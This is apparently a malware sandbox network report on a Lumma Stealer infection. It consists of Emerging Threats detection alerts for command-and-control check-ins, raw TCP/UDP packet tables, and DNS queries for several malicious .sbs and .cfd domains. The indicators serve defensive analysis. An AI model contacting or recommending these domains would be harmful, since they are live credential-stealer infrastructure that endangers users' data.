2024-10-13T11:42:14.795220+0200	2056566	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)	1	192.168.2.4	50289	1.1.1.1	53	UDP
2024-10-13T11:42:15.301012+0200	2056567	ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)	1	192.168.2.4	49733	172.67.152.13	443	TCP
2024-10-13T11:42:15.827479+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49733	172.67.152.13	443	TCP
2024-10-13T11:42:15.827479+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	172.67.152.13	443	TCP
2024-10-13T11:42:15.834870+0200	2056564	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)	1	192.168.2.4	63242	1.1.1.1	53	UDP
2024-10-13T11:42:16.329296+0200	2056565	ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)	1	192.168.2.4	49734	104.21.77.78	443	TCP
2024-10-13T11:42:16.767536+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49734	104.21.77.78	443	TCP
2024-10-13T11:42:16.767536+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49734	104.21.77.78	443	TCP
2024-10-13T11:42:16.813607+0200	2056562	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)	1	192.168.2.4	63926	1.1.1.1	53	UDP
2024-10-13T11:42:17.561594+0200	2056563	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)	1	192.168.2.4	49735	172.67.140.193	443	TCP
2024-10-13T11:42:18.000399+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49735	172.67.140.193	443	TCP
2024-10-13T11:42:18.000399+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49735	172.67.140.193	443	TCP
2024-10-13T11:42:18.026733+0200	2056560	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)	1	192.168.2.4	55421	1.1.1.1	53	UDP
2024-10-13T11:42:18.521222+0200	2056561	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)	1	192.168.2.4	49737	104.21.30.221	443	TCP
2024-10-13T11:42:18.937149+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49737	104.21.30.221	443	TCP
2024-10-13T11:42:18.937149+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.30.221	443	TCP
2024-10-13T11:42:18.960890+0200	2056558	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)	1	192.168.2.4	63734	1.1.1.1	53	UDP
2024-10-13T11:42:19.460477+0200	2056559	ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)	1	192.168.2.4	49741	172.67.141.136	443	TCP
2024-10-13T11:42:19.886594+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49741	172.67.141.136	443	TCP
2024-10-13T11:42:19.886594+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49741	172.67.141.136	443	TCP
2024-10-13T11:42:19.899655+0200	2056556	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)	1	192.168.2.4	49501	1.1.1.1	53	UDP
2024-10-13T11:42:20.429036+0200	2056557	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)	1	192.168.2.4	49743	188.114.96.3	443	TCP
2024-10-13T11:42:20.873314+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49743	188.114.96.3	443	TCP
2024-10-13T11:42:20.873314+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49743	188.114.96.3	443	TCP
2024-10-13T11:42:22.179172+0200	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49745	104.102.49.254	443	TCP
2024-10-13T11:42:23.168391+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49746	104.21.53.8	443	TCP
2024-10-13T11:42:23.168391+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49746	104.21.53.8	443	TCP
2024-10-13T11:42:24.345642+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49747	104.21.53.8	443	TCP
2024-10-13T11:42:24.345642+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49747	104.21.53.8	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 11:42:12.777863026 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:12.777926922 CEST	443	49731	188.114.97.3	192.168.2.4
Oct 13, 2024 11:42:12.778018951 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:12.780844927 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:12.780877113 CEST	443	49731	188.114.97.3	192.168.2.4
Oct 13, 2024 11:42:13.271801949 CEST	443	49731	188.114.97.3	192.168.2.4
Oct 13, 2024 11:42:13.271893024 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:13.275587082 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:13.275614977 CEST	443	49731	188.114.97.3	192.168.2.4
Oct 13, 2024 11:42:13.276026011 CEST	443	49731	188.114.97.3	192.168.2.4
Oct 13, 2024 11:42:13.316584110 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:13.353097916 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:13.353137970 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:13.353317022 CEST	443	49731	188.114.97.3	192.168.2.4
Oct 13, 2024 11:42:13.803191900 CEST	443	49731	188.114.97.3	192.168.2.4
Oct 13, 2024 11:42:13.803451061 CEST	443	49731	188.114.97.3	192.168.2.4
Oct 13, 2024 11:42:13.803527117 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:13.805727005 CEST	49731	443	192.168.2.4	188.114.97.3
Oct 13, 2024 11:42:13.805747986 CEST	443	49731	188.114.97.3	192.168.2.4
Oct 13, 2024 11:42:13.820444107 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:13.820549965 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:13.820641994 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:13.820971966 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:13.821008921 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:14.310065985 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:14.310272932 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:14.320581913 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:14.320668936 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:14.321041107 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:14.326405048 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:14.326405048 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:14.326544046 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:14.760730982 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:14.761008978 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:14.761219025 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:14.761585951 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:14.761585951 CEST	49732	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:14.761653900 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:14.761693001 CEST	443	49732	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:14.809989929 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:14.810074091 CEST	443	49733	172.67.152.13	192.168.2.4
Oct 13, 2024 11:42:14.810170889 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:14.810465097 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:14.810507059 CEST	443	49733	172.67.152.13	192.168.2.4
Oct 13, 2024 11:42:15.300923109 CEST	443	49733	172.67.152.13	192.168.2.4
Oct 13, 2024 11:42:15.301012039 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:15.303069115 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:15.303097010 CEST	443	49733	172.67.152.13	192.168.2.4
Oct 13, 2024 11:42:15.303620100 CEST	443	49733	172.67.152.13	192.168.2.4
Oct 13, 2024 11:42:15.304918051 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:15.304961920 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:15.305023909 CEST	443	49733	172.67.152.13	192.168.2.4
Oct 13, 2024 11:42:15.827557087 CEST	443	49733	172.67.152.13	192.168.2.4
Oct 13, 2024 11:42:15.827801943 CEST	443	49733	172.67.152.13	192.168.2.4
Oct 13, 2024 11:42:15.827940941 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:15.827941895 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:15.828032970 CEST	49733	443	192.168.2.4	172.67.152.13
Oct 13, 2024 11:42:15.828071117 CEST	443	49733	172.67.152.13	192.168.2.4
Oct 13, 2024 11:42:15.850724936 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:15.850786924 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:15.850852966 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:15.851329088 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:15.851361990 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:16.329216003 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:16.329296112 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:16.330992937 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:16.331023932 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:16.331361055 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:16.333163023 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:16.333379984 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:16.333415031 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:16.767612934 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:16.767853975 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:16.767954111 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:16.809106112 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:16.809106112 CEST	49734	443	192.168.2.4	104.21.77.78
Oct 13, 2024 11:42:16.809165955 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:16.809191942 CEST	443	49734	104.21.77.78	192.168.2.4
Oct 13, 2024 11:42:16.827920914 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:16.828018904 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:16.828141928 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:16.828444004 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:16.828480005 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:17.561525106 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:17.561594009 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:17.563613892 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:17.563653946 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:17.564068079 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:17.565310955 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:17.565346003 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:17.565402985 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:18.000468016 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:18.000732899 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:18.000806093 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:18.000878096 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:18.000914097 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:18.000952959 CEST	49735	443	192.168.2.4	172.67.140.193
Oct 13, 2024 11:42:18.000968933 CEST	443	49735	172.67.140.193	192.168.2.4
Oct 13, 2024 11:42:18.040836096 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.040910959 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.041371107 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.041708946 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.041738033 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.521079063 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.521222115 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.528666973 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.528702021 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.529167891 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.530823946 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.530823946 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.530925989 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.937249899 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.937480927 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.937544107 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.937755108 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.937800884 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.937829018 CEST	49737	443	192.168.2.4	104.21.30.221
Oct 13, 2024 11:42:18.937844038 CEST	443	49737	104.21.30.221	192.168.2.4
Oct 13, 2024 11:42:18.980334044 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:18.980418921 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:18.980529070 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:18.980947971 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:18.981030941 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:19.460292101 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:19.460477114 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:19.464502096 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:19.464555979 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:19.464979887 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:19.478441000 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:19.478441000 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:19.478663921 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:19.886681080 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:19.886909962 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:19.887178898 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:19.898066044 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:19.898066044 CEST	49741	443	192.168.2.4	172.67.141.136
Oct 13, 2024 11:42:19.898133993 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:19.898217916 CEST	443	49741	172.67.141.136	192.168.2.4
Oct 13, 2024 11:42:19.914042950 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:19.914066076 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:19.914133072 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:19.914592028 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:19.914601088 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:20.428977013 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:20.429035902 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:20.432763100 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:20.432768106 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:20.433159113 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:20.434214115 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:20.434225082 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:20.434302092 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:20.873398066 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:20.873625994 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:20.873774052 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:20.873774052 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:20.873905897 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 13, 2024 11:42:20.873914003 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 13, 2024 11:42:20.885485888 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:20.885574102 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:20.885677099 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:20.886075020 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:20.886158943 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:21.618779898 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:21.618969917 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:21.623306036 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:21.623362064 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:21.623841047 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:21.631947994 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:21.679436922 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.179341078 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.179425001 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.179430008 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.179488897 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.179522991 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.179536104 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.179594994 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.179609060 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.222961903 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.302496910 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.302557945 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.302644968 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.302684069 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.302706957 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.302735090 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.309123039 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.309282064 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.309313059 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.309355021 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.309377909 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.309396982 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.309490919 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.309508085 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.309525013 CEST	49745	443	192.168.2.4	104.102.49.254
Oct 13, 2024 11:42:22.309531927 CEST	443	49745	104.102.49.254	192.168.2.4
Oct 13, 2024 11:42:22.321861029 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:22.321883917 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:22.322068930 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:22.322308064 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:22.322319984 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:22.808043003 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:22.808163881 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:22.809770107 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:22.809773922 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:22.810158968 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:22.811688900 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:22.811717033 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:22.811773062 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.168406963 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.168538094 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.168598890 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.168608904 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.168684959 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.168725014 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.168729067 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.168894053 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.168943882 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.168982029 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.168991089 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.169003963 CEST	49746	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.169008970 CEST	443	49746	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.244405985 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.244492054 CEST	443	49747	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.244587898 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.244843006 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.244883060 CEST	443	49747	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.744805098 CEST	443	49747	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.745068073 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.746192932 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.746248007 CEST	443	49747	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.746597052 CEST	443	49747	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:23.747909069 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.747957945 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:23.748022079 CEST	443	49747	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:24.345737934 CEST	443	49747	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:24.345976114 CEST	443	49747	104.21.53.8	192.168.2.4
Oct 13, 2024 11:42:24.346180916 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:24.346180916 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:24.346182108 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:24.660465956 CEST	49747	443	192.168.2.4	104.21.53.8
Oct 13, 2024 11:42:24.660530090 CEST	443	49747	104.21.53.8	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 11:42:12.753678083 CEST	50276	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:12.773340940 CEST	53	50276	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:13.808578968 CEST	58518	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:13.819078922 CEST	53	58518	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:14.762852907 CEST	53988	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:14.771998882 CEST	53	53988	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:14.795219898 CEST	50289	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:14.809382915 CEST	53	50289	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:15.834870100 CEST	63242	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:15.849775076 CEST	53	63242	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:16.813606977 CEST	63926	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:16.825871944 CEST	53	63926	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:18.026732922 CEST	55421	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:18.040107012 CEST	53	55421	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:18.960890055 CEST	63734	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:18.979465961 CEST	53	63734	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:19.899655104 CEST	49501	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:19.913213968 CEST	53	49501	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:20.876852989 CEST	56403	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:20.884628057 CEST	53	56403	1.1.1.1	192.168.2.4
Oct 13, 2024 11:42:22.311084986 CEST	62341	53	192.168.2.4	1.1.1.1
Oct 13, 2024 11:42:22.321085930 CEST	53	62341	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 11:42:12.753678083 CEST	192.168.2.4	1.1.1.1	0x9a73	Standard query (0)	sippymroat.cfd	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:13.808578968 CEST	192.168.2.4	1.1.1.1	0x86e4	Standard query (0)	mathcucom.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:14.762852907 CEST	192.168.2.4	1.1.1.1	0x2f86	Standard query (0)	allocatinow.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:14.795219898 CEST	192.168.2.4	1.1.1.1	0xcc4	Standard query (0)	enlargkiw.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:15.834870100 CEST	192.168.2.4	1.1.1.1	0x1868	Standard query (0)	resinedyw.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:16.813606977 CEST	192.168.2.4	1.1.1.1	0x3008	Standard query (0)	vennurviot.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:18.026732922 CEST	192.168.2.4	1.1.1.1	0x563c	Standard query (0)	ehticsprocw.sbs	A (IP address)	IN (0x0001)	false
